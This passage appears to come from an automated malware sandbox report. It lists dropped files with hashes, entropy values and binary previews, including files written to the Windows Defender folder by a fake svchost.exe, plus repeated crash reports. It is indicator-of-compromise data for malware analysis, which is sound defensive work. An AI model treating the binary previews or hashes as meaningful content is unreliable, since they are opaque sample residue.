                                                                                                                                                                                                                  Preview:...[..A.9l.....|.e.8w.!..1....j..r.^..r.....'..>....=.s.$$71...I...i.....==.7.rg~..j#.`S..y0,F..%....c...Kr).#FB...B...........H<*../.. ..>.Y......:X..G..4.j....{W.A. ........*.....6.P.Q..[).\.T...z.PK.n.P.2, ..CG..,...q..c....S.}.f..K..8...y=..+*...S.b..cAMN.a.U.q.c3.9^.hD.+..'.....-.....(t...|.....(.$.......`<..n..|A..7.W..W...u..(eX&....C8....(.'..V..O.......F...:ET;^.B..(.N*.:.a....n..........'A:..Q.!j..J.m.=.^.-=-.....*..>..bvF..K.H....8.9...g?=+..D.....9@...'ON.G'.J./....P..x.UGRWH.{8...u......jY(h..7..V.......i(..|...,..|;.e.+<;...l..I..,.Kf^....$.&.$.|7....h..6Rn..+z.~/4W(......f.P..R6.....[a.~.h.+.u.[...sO.(Fzy.;.....<...A..@..N...<. ..Z... .g.+....p.(........#....r6.. Eo....3......jIg}.....z_..)'+....p............P?..h1..x.Nk.....M...Z.......0+.Yf.+.O.M..&V...X.fofX...wt.L#.R..h...z.....,../......m'..dsn\........V..4Eq....w....7.M.~ ...d.]ij.........1..\.....:.+y..).........O.,..v..C.EH.C.cI.3.:...7=PM.6.....C .d..

                                                                                                                                                                                                                  C:\Program Files (x86)\Windows Defender\qexyhuv.com

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):114
                                                                                                                                                                                                                  Entropy (8bit):6.479691220248167
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                                  MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                                  SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                                  SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                                  SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:...[..A.9l.....|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..

                                                                                                                                                                                                                  C:\Program Files (x86)\Windows Defender\vofycot.com

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):25028
                                                                                                                                                                                                                  Entropy (8bit):7.979699699980115
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:U4ak8nl3r9HtbQ+z87BVjjWk5rSV4Z8tPzh3XCV5:VJElb9H187TjWKW4S8P
                                                                                                                                                                                                                  MD5:576A9BD2675F4AF8382B676F390A9500
                                                                                                                                                                                                                  SHA1:E3BEFE9AB331BA51E76AE56643BD37FF87E0E205
                                                                                                                                                                                                                  SHA-256:4EE290665A327D45B14757A7D11D509976DCF2BAF094CF3DED1CA31B194F821A
                                                                                                                                                                                                                  SHA-512:6C0079D523F7C4CF42C0321CF4A61A53E8315532D45CB1D919447F7B00D47A0A7D6AB57692BBF3DA1E7194BB9A30E23BC227CF86186B5D7938624D0DC8C7EFF1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:...[..A.9l.....|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g.*.=.....8..Y..2....t.:..j>....W...p.P..Y&..pUnV.O&..\8.."..R.X/.1..$.E.+r.b.@..&r..`r..Y.p..c....p.D.l.n .)..%..l...p.....a......h...e....g.<.......;). ?..zI..kW.......&.. :.>.....tW..j:.".........T...M... X.;.TB.'s.^vC>.:.....=..R..VZ..%.k..].>w..O.;.a.R.!-<.....$...$..f4...G.C..R.w.....dyn:....BD..aZ...v.G.C#...l......w.TW.RO.k<.KA.....'./d.. ....H......am.J*...|..d|..|.9 6...x......0.Ww.....l.h.j.m-...~..+.#..v{.*!r.=..^....{.M..H....<?.v.1.h.b.x......n+V#Jo-.6..D._-...SZ....I...~.o..I...;.u.*....n.+.......+FA..mc....:Im.S..8..>....d.Id......zK..qtqH...;..........Z..V/..e9..r..Qw.....k\......M.f#.Xi.D.M....t....RWf&hV...in.Lk...=....x....l.........m&..A(t.............dGs....`....).A.w}..I6..=p.........r..R......s.!%C.;........z...[.Z.....Z.e..).(...#/.G.c......Z(.c..

                                                                                                                                                                                                                  C:\Program Files (x86)\Windows Defender\vojyqem.com

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1094
                                                                                                                                                                                                                  Entropy (8bit):7.839510823729912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:IZsdS4WMBLdxezuQj1kZ8l9KfPqiH4E/kTXRUubqU:QsSixez1Rg8yuIkTXRdqU
                                                                                                                                                                                                                  MD5:4A7E5199E2A9EA5F92BC9EDF6DCB1849
                                                                                                                                                                                                                  SHA1:F1FC2703611E16D6C10AC32274C7534497B3EA3B
                                                                                                                                                                                                                  SHA-256:95A468FFC06AA70269D28E83C5A09E59B8A824E1FC0DDF0B6C0D1D836E0F9A0E
                                                                                                                                                                                                                  SHA-512:C1E17D0A83BB42394F589AAE14B41842B39B778C9B47D93E44CED7389604E5022BC6872FC502028CC980CEC878952051E681ABC5985C5FFD4CFB381E42B57201
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:...{:.a)9l.....(.|.t;....>....V>.%.B...........%$......P...J^X*..q....z...<.%...U<e..U9.y".[.F7..r5....=.;ZO..*./.......%....}..~:...3;.s...s/2../....2.f..F%H.....uJ.".e.....-.....,....U....L../..~...S$.%.TXC. evx.....t0..e.z=...P....(.r..`..~...}t...0l...D.).Ju.X..c.B.|.lv....5h.:...}...."..R.|g...?.....).2A......op.,8..{Z..7..O.....i..-7.:....[`Q..Pb.(.....L......L...5]W&X...s6..B_s.n......r..._.EZ...m.a._..+>.FO...9.G./u;G..\.`.....7.v..g g./.._.`...H.\.".;x2#..Uj..U.g.c..-@.....O...9..+gn..~y.Asx.>......^..w..+.J.....8!.WaO.0Q.xk..e.1<6...s..[...=.Rv..@...b.i.-.mp....+..x.#..p~.4D(.!.......r..y.B6.....p.c.b.+.e.L....!.E/N;3.x...P=........R..... ..X.-..s. .&.._6z....^........g..|....*.2......(......N;.....GR..AaM....."..........\...8...).9>.6..;R*..|........|.N>.,...K.. s...U9}<g....p5..).B..W...f..S...1.[...J....ohU..........#..lk]...v....|...^L..!^..0@.........$.........R.rGY.{.........O4..Y.[2....Q.c..;..... Z.C.`.......=.c..

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PMnAVsjMPucERAKE_12ae2d6cdbb4567c5635afbf27bcc9d664aca4b_602c500d_01944aee-e1e7-48b0-916a-28bc3e11cd36\Report.wer

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.0328449904901382
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:3et1eAIMhAw0BU/n555KjRJd64zuiFV9Z24IO8U85S:0zh0BU/gjPxzuiFXY4IO8O
                                                                                                                                                                                                                  MD5:1BEE41582A64BD60A55D95D108CD1A81
                                                                                                                                                                                                                  SHA1:99E4B798049A0D5A47015D89BBF01F1224810633
                                                                                                                                                                                                                  SHA-256:D3D323283495A771046D19AF5209AEE4223F0BADB5D8853A3E0B29C911FE1B54
                                                                                                                                                                                                                  SHA-512:FE49F5E86367D6D6C75DCDAED0AC0C4CB75EC3F7FAE6EACDB880B32B8BD93B5F858ACA62252E47FE12849ED7854145E44F3B1404AC000B2804993CDE8FDAEB69
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.1.0.6.2.1.7.0.0.1.8.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.1.0.6.6.5.4.5.0.1.8.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.9.4.4.a.e.e.-.e.1.e.7.-.4.8.b.0.-.9.1.6.a.-.2.8.b.c.3.e.1.1.c.d.3.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.e.d.6.f.d.4.-.a.9.6.2.-.4.9.6.d.-.8.0.6.4.-.7.9.0.c.9.f.d.0.6.6.1.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.M.n.A.V.s.j.M.P.u.c.E.R.A.K.E.W.N.F.I.m.y.S.C.F.H.o.L.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.0.0.-.0.0.0.1.-.0.0.1.5.-.1.5.8.c.-.5.4.2.c.6.2.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.2.3.0.8.4.c.5.2.e.6.d.3.b.5.3.8.2.9.4.8.4.5.8.5.5.d.f.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.P.M.n.A.V.s.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PMnAVsjMPucERAKE_12ae2d6cdbb4567c5635afbf27bcc9d664aca4b_602c500d_0a61631d-a14a-4539-98d3-55cfc8d28ee8\Report.wer

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):0.9868129628595451
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:CMWda1eAIM9Aw0BU/n555KjRJdwzuiFGZ24IO8U85S:1Wyz90BU/gjPCzuiFGY4IO8O
                                                                                                                                                                                                                  MD5:F15F7450DB66E1E121AB79BC7972BBA6
                                                                                                                                                                                                                  SHA1:42182A4355C6A0F5A4EC9E15D7FD11B910A1D755
                                                                                                                                                                                                                  SHA-256:956AAA93F01F6F001D98D98E656AE391C5CFEBB0D418391BB353413E75551D6E
                                                                                                                                                                                                                  SHA-512:866B9698591385BFB4C22951FEF7531F3EF574C52B5E68AD68AEDA5FE8C75263A294B2C804020B59F72600A4A29132A726F5AF3E6911E5563CCF0F2AFC27D984
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.1.0.8.0.6.3.6.6.4.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.1.0.8.1.3.3.9.7.6.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.6.1.6.3.1.d.-.a.1.4.a.-.4.5.3.9.-.9.8.d.3.-.5.5.c.f.c.8.d.2.8.e.e.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.b.a.2.1.3.1.-.0.7.a.b.-.4.6.0.3.-.a.e.d.e.-.9.a.e.c.4.9.3.6.0.e.4.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.M.n.A.V.s.j.M.P.u.c.E.R.A.K.E.W.N.F.I.m.y.S.C.F.H.o.L.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.3.8.-.0.0.0.1.-.0.0.1.5.-.4.6.f.b.-.3.d.2.c.6.2.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.2.3.0.8.4.c.5.2.e.6.d.3.b.5.3.8.2.9.4.8.4.5.8.5.5.d.f.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.P.M.n.A.V.s.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PMnAVsjMPucERAKE_12ae2d6cdbb4567c5635afbf27bcc9d664aca4b_602c500d_11d111c9-9b2a-4a8c-b75d-6b9459182a88\Report.wer

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.0263196662857732
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:wtz9L1eAIMJAw0BU/n555KjRJdqTzuiFV9Z24IO8U85S:onzJ0BU/gjPyzuiFXY4IO8O
                                                                                                                                                                                                                  MD5:4424C9607F17ABC60D2267231A3A8AA4
                                                                                                                                                                                                                  SHA1:268230E162038FB75B072ADAC4C6F7407CECD744
                                                                                                                                                                                                                  SHA-256:75B6791BD987839570A3A624475EEDEABF18932E0C8C4C19064855D0F3C3CC3E
                                                                                                                                                                                                                  SHA-512:2EB661B9C51B5A2D5722B8C96DAA9A4CEB88DDD5E2568C3C126D975781D9681CFCD7298ACD7B4F8EFADB9B34F062878840E730A4BB7F0574AED334DABF2B345F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.1.0.6.9.6.7.4.0.8.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.1.0.7.0.8.7.7.2.0.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.1.d.1.1.1.c.9.-.9.b.2.a.-.4.a.8.c.-.b.7.5.d.-.6.b.9.4.5.9.1.8.2.a.8.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.d.8.3.0.a.3.-.6.e.d.5.-.4.4.2.e.-.a.3.c.7.-.4.3.2.6.6.6.e.1.a.2.4.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.M.n.A.V.s.j.M.P.u.c.E.R.A.K.E.W.N.F.I.m.y.S.C.F.H.o.L.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.e.4.-.0.0.0.1.-.0.0.1.5.-.2.b.d.9.-.4.9.2.c.6.2.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.2.3.0.8.4.c.5.2.e.6.d.3.b.5.3.8.2.9.4.8.4.5.8.5.5.d.f.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.P.M.n.A.V.s.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PMnAVsjMPucERAKE_12ae2d6cdbb4567c5635afbf27bcc9d664aca4b_602c500d_39cbfe93-2849-4ad4-bdf2-1123fba6a42b\Report.wer

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.0263640630408497
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:LG581eAIMgAw0BU/n555KjRJdSTzuiFV9Z24IO8U85SU:iYzg0BU/gjPKzuiFXY4IO8OU
                                                                                                                                                                                                                  MD5:42291B5467D24A1F39F89583A88226BD
                                                                                                                                                                                                                  SHA1:DEFDEB39336406D879BDAE25C8A6AED25A908D20
                                                                                                                                                                                                                  SHA-256:48368753B1BF8C413DCDA5763A49E209F52E223AB8064F4A8D2FD2CF7A9C6C70
                                                                                                                                                                                                                  SHA-512:1DF926F1D063575D30815C91EE9EFB9B4D0A6D947539CE171C881814EEEAB263E8A7CCEA276F8E4EA01DBAC8CA4DCDAFEB5CE0291733992F8B37218C2DF96AAF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.1.0.7.0.9.7.0.8.9.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.1.0.7.3.3.4.5.8.9.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.9.c.b.f.e.9.3.-.2.8.4.9.-.4.a.d.4.-.b.d.f.2.-.1.1.2.3.f.b.a.6.a.4.2.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.0.c.2.7.3.1.-.b.6.7.9.-.4.2.7.3.-.9.8.4.e.-.2.c.c.2.c.c.6.a.c.8.0.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.M.n.A.V.s.j.M.P.u.c.E.R.A.K.E.W.N.F.I.m.y.S.C.F.H.o.L.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.0.8.-.0.0.0.1.-.0.0.1.5.-.8.d.d.a.-.4.6.2.c.6.2.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.2.3.0.8.4.c.5.2.e.6.d.3.b.5.3.8.2.9.4.8.4.5.8.5.5.d.f.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.P.M.n.A.V.s.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PMnAVsjMPucERAKE_12ae2d6cdbb4567c5635afbf27bcc9d664aca4b_602c500d_81a62f5b-6f36-4c12-94b1-65b400da3bdf\Report.wer

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.0266432012868925
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:LJae1eAIM9Aw0BU/n555KjRJd6TzuiFV9Z24IO8U85S:tz90BU/gjPCzuiFXY4IO8O
                                                                                                                                                                                                                  MD5:913F67D9CC0F7079186633B5CBC7645C
                                                                                                                                                                                                                  SHA1:5444A280E6B2465037E3989BAE1B923215EF6FC3
                                                                                                                                                                                                                  SHA-256:7A6E08229EFF5C5F91D9F42DB8A8123176E92A11E783884E0CDC6CD1D07F8B6E
                                                                                                                                                                                                                  SHA-512:96A57DA619C90FE33FD65C01C396B8A838787ED9C3510EEA9679F4FC7DF6DEB4ACCABF9B40C814332CADE3DDAF66B63A456BD41D4B0DBBECCAB27F6DF305CDB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.1.0.6.3.2.7.4.6.1.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.1.0.6.6.8.0.5.8.7.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.a.6.2.f.5.b.-.6.f.3.6.-.4.c.1.2.-.9.4.b.1.-.6.5.b.4.0.0.d.a.3.b.d.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.5.b.4.8.f.f.-.5.3.7.7.-.4.1.f.9.-.8.d.b.f.-.a.c.a.1.1.c.8.6.7.0.9.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.M.n.A.V.s.j.M.P.u.c.E.R.A.K.E.W.N.F.I.m.y.S.C.F.H.o.L.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.d.c.-.0.0.0.1.-.0.0.1.5.-.c.b.d.7.-.5.0.2.c.6.2.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.2.3.0.8.4.c.5.2.e.6.d.3.b.5.3.8.2.9.4.8.4.5.8.5.5.d.f.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.P.M.n.A.V.s.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PMnAVsjMPucERAKE_12ae2d6cdbb4567c5635afbf27bcc9d664aca4b_602c500d_b252d2bb-bf34-4e1b-83c1-d7794116214c\Report.wer

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.0264033868549116
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ygghi1eAIMhAw0BU/n555KjRJd6TzuiFV9Z24IO8U85S0:SWzh0BU/gjPCzuiFXY4IO8O
                                                                                                                                                                                                                  MD5:7AD3E09D0801127C325EFE40103CDC0E
                                                                                                                                                                                                                  SHA1:9CF76CFC77539D76FF7C3A41C857C0ED7EAAD017
                                                                                                                                                                                                                  SHA-256:173B004CF0FAB7A882505E43BB8000AC784A46B302FAF9026B0E8E2D3929E7BF
                                                                                                                                                                                                                  SHA-512:C05FC3FAEAA1D766EF7C9C773A3F8B7B4AAB20A97A5213EB324323D036C534F677325E17ED2ADB8FF5669C8285E73EEC54BAD1E4D5EC47534426C8F94A5454D3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.1.0.6.2.2.2.0.4.1.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.1.0.6.7.1.2.6.6.7.9.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.5.2.d.2.b.b.-.b.f.3.4.-.4.e.1.b.-.8.3.c.1.-.d.7.7.9.4.1.1.6.2.1.4.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.d.b.6.b.b.8.-.8.1.7.d.-.4.3.2.4.-.b.b.9.0.-.d.e.b.c.0.d.3.c.1.1.9.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.M.n.A.V.s.j.M.P.u.c.E.R.A.K.E.W.N.F.I.m.y.S.C.F.H.o.L.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.c.4.-.0.0.0.1.-.0.0.1.5.-.b.a.0.c.-.5.2.2.c.6.2.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.2.3.0.8.4.c.5.2.e.6.d.3.b.5.3.8.2.9.4.8.4.5.8.5.5.d.f.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.P.M.n.A.V.s.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PMnAVsjMPucERAKE_12ae2d6cdbb4567c5635afbf27bcc9d664aca4b_602c500d_b6e6a07c-cf9f-4ff0-ab7b-9112b8b1ab5c\Report.wer

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.026726200916177
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:gUb1eAIMOAw0BU/n555KjRJd6TzuiFGZ24IO8U85SR:HzO0BU/gjPCzuiFGY4IO8O
                                                                                                                                                                                                                  MD5:C8453E01694A528C2CD6D237C557D3ED
                                                                                                                                                                                                                  SHA1:43E10F51C142B7073929745672215C60E425894C
                                                                                                                                                                                                                  SHA-256:F9FBC163789CF995ABE4672CBBD5AC4E9613E7CDCCC191E736ECFC2C142299BD
                                                                                                                                                                                                                  SHA-512:89A4A2164C47579D18E1B418F11965E3314942487FBA73034D3EEB4CB4C093C9684FDE3EA9F00538A4E9322435AD8C4E8DC54C1E6540812CDC984AC521F3BA69
                                                                                                                                                                                                                  Malicious:false
